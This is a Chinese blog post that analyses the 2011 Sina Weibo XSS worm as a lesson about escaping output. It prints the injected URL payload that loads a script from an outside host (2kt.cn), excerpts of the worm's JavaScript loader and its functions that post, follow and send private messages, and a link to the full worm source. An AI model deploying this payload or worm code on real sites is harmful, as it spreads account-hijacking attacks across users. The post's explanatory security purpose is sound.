XSS-从weibo蠕虫事件学习

简介:

    XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。

     

    Xss的例子(以新浪微博的6.9的hellosamy蠕虫事件为例):

     

    sina的名人堂页面页面上存在这么个链接

    <a href="http://weibo.com/pub/star/g/123">这个是xss</a>

     

    其实在服务器端是这么写的(猜测,真实代码长啥样不知道,但是一定是忘记做转义就输出了):

    Echo '<a href="http://weibo.com/pub/star/g/{$uname}">这个是xss</a>'

     

    其中uname并没有做htmlspecialchars。相当于是直接由用户输入,然后输出在页面上了。

    这样的html就是存在xss漏洞

     

    好了,这个漏洞被发现了,下面要利用它做什么呢?

    1 将uname设置成xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update

    这样这个url就变成了

    clip_image001

    其中的引号被封闭了,然后这个页面自动运行了一段js脚本

     

    这个js脚本做了这样的事情:

    1 发送一个微博(这个是之所以成为蠕虫的原因,这个微博中附带着同样的一个连接)

    2 加关注uid为2201270010

    3 发私信,向好友传播链接

     

    js的下载代码在http://www.stwind.org/wp-content/uploads/2011/06/06.28_sina_XSS.txt.zip

     

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    try {
     
    x= "g=document.createElement('script');g.src='http://www.2kt.cn/images/t.js';document.body.appendChild(g)" ;window.opener.eval(x);
     
    }
     
    catch (e){}
     
    main();
     
    var  t=setTimeout( 'location="http://weibo.com/pub/topic";' ,5000);

     

    其中就是在打开的页面加入了<script节点>,并执行

    main中是发送微博,加关注,发私信三个动作

    当5000秒后,当前页重新定位到public/topic上

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    function main(){
     
    try {
     
    publish();
     
    }
     
    catch (e){}
     
    try {
     
    follow();
     
    }
     
    catch (e){}
     
    try {
     
    message();
     
    }
     
    catch (e){}
     
    }
    比如

     

    1
    2
    3
    4
    5
    6
    7
    8
    9
    function publish(){
     
    url = 'http://weibo.com/mblog/publish.php?rnd='  + new  Date().getTime();
     
    data = 'content='  + random_msg() + '&pic=&styleid=2&retcode=' ;
     
    post(url,data, true );
     
    }

    模拟post请求,由于这个js是在weibo网页上调用的,所以就没有跨域问题

     

    直接post就可以产生这个效果

     

    注:这次事件中还用到了短链接服务

    短链接服务能自定义用户链接,比如http://weibo.com/xyyyd%22%3E%3Cscript%20src=//www.2kt.cn/images/t.js%3E%3C/script%3E?type=update

    这么长一个链接能变为http://t.cn/atmcqn

    这样能增加用户的点击成功率

     

    事实证明,建站是需要非常小心的,每个页面,每个输出,如果有一两个漏洞,都可能造成全站的大灾难!!引以为戒!

     

    相关有用的链接地址:

    http://soft.yesky.com/security/156/30179156.shtml

    http://www.youxia.org/2011/12/XSS-RootKit.html

    http://www.youxia.org/2010/04/Anti-XSS.html

    http://blog.sina.com.tw/gn00502101/article.php?pbgid=103224&entryid=604456

     

    ----------------------

    作者:yjf512(轩脉刃)

    出处:http://www.cnblogs.com/yjf512/

    本文版权归yjf512和cnBlog共有,欢迎转载,但未经作者同意必须保留此段声明

目录
相关文章
|
5月前
|
Web App开发 安全 关系型数据库
xss漏洞原理(五)BeEF
xss漏洞原理(五)BeEF
|
5月前
|
安全
xss漏洞原理(五)BeEF
xss漏洞原理(五)BeEF
|
6月前
|
SQL 安全 数据库
惊!Python Web安全黑洞大曝光:SQL注入、XSS、CSRF,你中招了吗?
在数字化时代,Web应用的安全性至关重要。许多Python开发者在追求功能时,常忽视SQL注入、XSS和CSRF等安全威胁。本文将深入剖析这些风险并提供最佳实践:使用参数化查询预防SQL注入;通过HTML转义阻止XSS攻击;在表单中加入CSRF令牌增强安全性。遵循这些方法,可有效提升Web应用的安全防护水平,保护用户数据与隐私。安全需持续关注与改进,每个细节都至关重要。
174 5
|
10月前
|
存储 安全
第二轮学习笔记:XSS跨站脚本漏洞
第二轮学习笔记:XSS跨站脚本漏洞
94 0
|
安全 Apache
27、XSS漏洞(恶意链接)
27、XSS漏洞(恶意链接)
162 0
27、XSS漏洞(恶意链接)
|
安全 网络安全 内存技术
网络安全——xss漏洞之最全事件函数汇总
还在为xss漏洞找不到而发愁?看看这篇最全xss攻击函数汇总在说
583 0
网络安全——xss漏洞之最全事件函数汇总
ADI
|
存储 JavaScript 安全
[记录] web安全之XSS攻击
[记录] web安全之XSS攻击
ADI
167 0
|
Web App开发 安全
Web安全系列(二):XSS 攻击进阶(初探 XSS Payload)
上一章我谈到了 XSS 攻击的几种分类以及形成的攻击的原理,并举了一些浅显的例子,接下来,我就阐述什么叫做 `XSS Payload` 以及从攻击者的角度来初探 XSS 攻击的威力。
3101 0
|
JavaScript 安全 前端开发
|
安全 PHP 数据库